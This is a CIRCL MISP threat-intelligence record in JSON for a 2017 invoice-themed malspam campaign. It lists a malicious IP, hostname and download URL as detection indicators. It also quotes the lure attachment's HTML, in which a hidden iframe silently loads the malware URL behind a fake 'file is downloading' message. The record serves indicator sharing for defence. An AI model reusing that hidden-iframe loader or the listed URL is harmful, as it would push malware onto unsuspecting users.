misp-circl-feed/feeds/circl/misp/59b2ada6-f428-4476-b218-7c5a950d210f.json

{
  "Event": {
    "analysis": "0",
    "date": "2017-09-08",
    "extends_uuid": "",
    "info": "Malspam 2017-09-08 - 'Emailed Invoice -' - .html attachment",
    "publish_timestamp": "1504882335",
    "published": true,
    "threat_level_id": "3",
    "timestamp": "1504882325",
    "uuid": "59b2ada6-f428-4476-b218-7c5a950d210f",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      },
      {
        "colour": "#3a7300",
        "local": false,
        "name": "circl:incident-classification=\"malware\"",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Network activity",
        "comment": "old.tsg-upravdom.ru",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1504882167",
        "to_ids": true,
        "type": "ip-dst",
        "uuid": "59b2adf7-e484-4f71-b700-4e09950d210f",
        "value": "81.177.141.82"
      },
      {
        "category": "Network activity",
        "comment": "",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1504882167",
        "to_ids": true,
        "type": "hostname",
        "uuid": "59b2adf7-45cc-4403-ab0c-4129950d210f",
        "value": "old.tsg-upravdom.ru"
      },
      {
        "category": "Network activity",
        "comment": "initial download location",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1504882167",
        "to_ids": true,
        "type": "url",
        "uuid": "59b2adf7-7da8-4100-b1ed-4896950d210f",
        "value": "http://old.tsg-upravdom.ru/w/ciji.php"
      },
      {
        "category": "Payload delivery",
        "comment": "I_736305.html attachment to email",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1504882275",
        "to_ids": false,
        "type": "text",
        "uuid": "59b2ae55-9278-490b-b916-7959950d210f",
        "value": "<div style=\"background:#eee;border:1px solid #ccc;padding:5px 10px;\">Your file is downloading. Please wait...</div>\r\n<iframe src=\"http://old.tsg-upravdom.ru/w/ciji.php\" style=\"display: none;\">\r\n</iframe>"
      }
    ]
  }
}